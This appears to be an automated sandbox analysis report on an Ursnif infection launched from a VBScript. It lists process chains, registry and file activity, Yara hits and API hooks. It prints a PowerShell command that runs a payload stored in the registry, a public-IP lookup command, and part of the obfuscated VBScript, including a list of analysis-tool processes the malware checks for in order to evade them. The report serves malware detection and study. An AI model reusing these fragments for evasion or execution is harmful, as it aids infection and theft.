Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.862111096.000001E464460000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.878013598.00000197D35E0000.00000002.00000001.sdmp
Source:	Binary string: 2.pdb source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000002.1313166941.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: 2.pdbIR source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
Source:	Binary string: n.pdbaP source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000020.00000002.1313166941.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")REM highwaymen Cinderella. 2193015 gummy market surjection sculptural warty cotman cliff ketch stroke medial gaslight mandate papyrus calcareous colonist Pearson expulsion Rembrandt krypton Huber debility geodetic vocabularian sour roe inoculate heathenish hearty crystalline oldster Tamil price masochist Bruce ecumenist puree McLeod divorce Muenster landslide committed inhabitation sixfold aluminate larceny pragmatism Sturbridge659 octogenarian cress. campground Giuliano lute Taipei valedictorian Koppers cit. 9962460 celebrant liaison posable shutdown mobcap fit pore wapato. adipic readout Bailey brokerage plausible intoxicant Copernican parsimonious entice razorback Canis. foamflower increase inception requisite contemporaneous switchboard. heaven. 1854466 talky Siegfried, phylogenetic weasel asymmetry phloem ingrained Moiseyev TILpy.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction DJTznna()on error resume nextIf (InStr(WScript.ScriptName, cStr(262827114)) > 0 And NEdZn = 0) ThenExit FunctionREM EEOC taxonomy. guanidine oncoming telephonic uttermost silken Afrikaans Dominique southern Menelaus Dortmund garter804. repellent burglary Sergei job dad tram bonnet. 4263459 Liz accordant fascism grapple prodigal polytope ascomycetes. municipal katydid throaty youngster. Jeremiah Sheehan squall, ostrich invigorate lossy. scops exempt retrospect, 82121 erudite PhD Helmholtz End IfREM seaside melanoma slaughter gavotte turbidity nob, infirmary promulgate cultural. 2883954 Guinevere conceit aviatrix agribusiness, 3430970 knoll clock extract Effie snakeroot kale inconsiderable poison julep coverall poodle farm, prim sadist bristlecone squaw skimp bullet logician inopportune ferry term legend aborigine capitulate journalese demand Mudd label switchblade dreary move Russo clipboard Benny denote Calhoun technic fortyfold urge Pusan committee. 9589938 sextic flounder Friedrich652 Malawi Agnes respirator basketball mud Hokan, Cameroun sportsman638 Hansen Sal nickname interstitial moor invariable pregnant countersink subterfuge ' mozzarella183 quintessential nourish sardonic incoherent indy legend513 probe. narcissist Delmarva alma Josef tutor episode Coronado Poynting strata weatherstripping coquina Sims querulous Clarendon alba connotative. pansy advent vex Brittany thicket meteor picofarad contingent inaccuracy sustenance ashore bookishproc = ((95 + 2327.0) - (4 + (37 + 2381.0)))shivery = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplor

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'	Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 32_2_04DA4DCD push 3B000001h; retf

32_2_04DA4DD2

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\earmark.avchd	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\earmark.avchd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\0xyz4ry0opa2.vbs

Jump to behavior

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
